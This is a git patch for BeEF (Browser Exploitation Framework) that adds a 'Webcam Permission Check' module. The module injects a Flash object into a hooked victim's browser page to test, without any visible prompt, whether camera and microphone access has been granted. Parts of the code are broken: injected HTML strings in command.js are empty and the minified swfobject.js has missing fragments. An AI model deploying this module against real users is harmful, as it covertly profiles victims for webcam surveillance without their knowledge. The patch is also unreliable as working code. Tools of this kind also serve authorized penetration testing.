From cf4ab9533ec28101414d4749b2758639d3a83eff Mon Sep 17 00:00:00 2001 From: BWZ Date: Wed, 3 Apr 2013 09:01:15 +1000 Subject: [PATCH] Added Webcam Permission Check Module --- .../webcam_permision_check/cameraCheck.as | 54 ++++++++++++++++++ .../webcam_permision_check/cameraCheck.swf | Bin 0 -> 6048 bytes .../browser/webcam_permision_check/command.js | 39 +++++++++++++ .../webcam_permision_check/config.yaml | 15 +++++ .../browser/webcam_permision_check/module.rb | 18 ++++++ .../webcam_permision_check/swfobject.js | 4 ++ 6 files changed, 130 insertions(+) create mode 100644 modules/browser/webcam_permision_check/cameraCheck.as create mode 100644 modules/browser/webcam_permision_check/cameraCheck.swf create mode 100644 modules/browser/webcam_permision_check/command.js create mode 100644 modules/browser/webcam_permision_check/config.yaml create mode 100644 modules/browser/webcam_permision_check/module.rb create mode 100644 modules/browser/webcam_permision_check/swfobject.js diff --git a/modules/browser/webcam_permision_check/cameraCheck.as b/modules/browser/webcam_permision_check/cameraCheck.as new file mode 100644 index 000000000..c4fcc40d4 --- /dev/null +++ b/modules/browser/webcam_permision_check/cameraCheck.as @@ -0,0 +1,54 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Source ActionScript for cameraCheck.swf +package { + + import flash.display.Sprite; + import flash.external.ExternalInterface; + import flash.media.Camera; + import flash.system.Security; + import flash.system.SecurityPanel; + + public class CamCheck extends Sprite { + + var _cam:Camera; + + public function CamCheck() { + + if (Camera.isSupported) { + this._cam = Camera.getCamera(); + + if (!this._cam) { + + //Either the camera is not available or some other error has occured + ExternalInterface.call("naPermissions"); + + } else if (this._cam.muted) { + + //The user has not allowed access to the camera + ExternalInterface.call("noPermissions"); + + // Uncomment this show the privacy/security settings window + //Security.showSettings(SecurityPanel.PRIVACY); + } else { + + //The user has allowed access to the camera + ExternalInterface.call("yesPermissions"); + } + + } else { + + //Camera Not Supported + ExternalInterface.call("naPermissions"); + + } + + } + + } + +} \ No newline at end of file diff --git a/modules/browser/webcam_permision_check/cameraCheck.swf b/modules/browser/webcam_permision_check/cameraCheck.swf new file mode 100644 index 0000000000000000000000000000000000000000..7894dd240ee75dd524ce66e70711b5484113d47a GIT binary patch literal 6048 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 aMzLkw&%dPB@;~Lx{nOblME(Ofu&=KNOxqj) literal 0 HcmV?d00001 diff --git a/modules/browser/webcam_permision_check/command.js b/modules/browser/webcam_permision_check/command.js new file mode 100644 index 000000000..310b0fd61 --- /dev/null +++ b/modules/browser/webcam_permision_check/command.js @@ -0,0 +1,39 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + + +beef.execute(function() { + + + //These 3 functions [naPermissions() The camera is not available or not supported + // yesPermissions() The user is allowing access to the camera / mic + // yesPermissions() The user has not allowed access to the camera / mic + // Flash will invoke these functions directly. + var js_functions = ''; + + + var body_flash_container = '
'; + + //A library that helps include the swf file + var swfobject_script = '' + + //This is the javascript that actually calls the swfobject library to include the swf file + var include_script = ''; + + + //Add flash content + $j('body').append(js_functions, swfobject_script, body_flash_container, include_script); + +}); + + + + + diff --git a/modules/browser/webcam_permision_check/config.yaml b/modules/browser/webcam_permision_check/config.yaml new file mode 100644 index 000000000..78558df0d --- /dev/null +++ b/modules/browser/webcam_permision_check/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + wb: + enable: true + category: "Browser" + name: "Webcam Permission Check" + description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)" + authors: ["@bw_z"] + target: + working: ["All"] diff --git a/modules/browser/webcam_permision_check/module.rb b/modules/browser/webcam_permision_check/module.rb new file mode 100644 index 000000000..2cf19a11d --- /dev/null +++ b/modules/browser/webcam_permision_check/module.rb @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +class Wb < BeEF::Core::Command + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/cameraCheck.swf', '/cameraCheck', 'swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/swfobject.js', '/swfobject', 'js') + end + + def post_execute + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js') + end + +end diff --git a/modules/browser/webcam_permision_check/swfobject.js b/modules/browser/webcam_permision_check/swfobject.js new file mode 100644 index 000000000..8eafe9dd8 --- /dev/null +++ b/modules/browser/webcam_permision_check/swfobject.js @@ -0,0 +1,4 @@ +/* SWFObject v2.2 + is released under the MIT License +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y0){for(var af=0;af0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad'}}aa.outerHTML='"+af+"";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab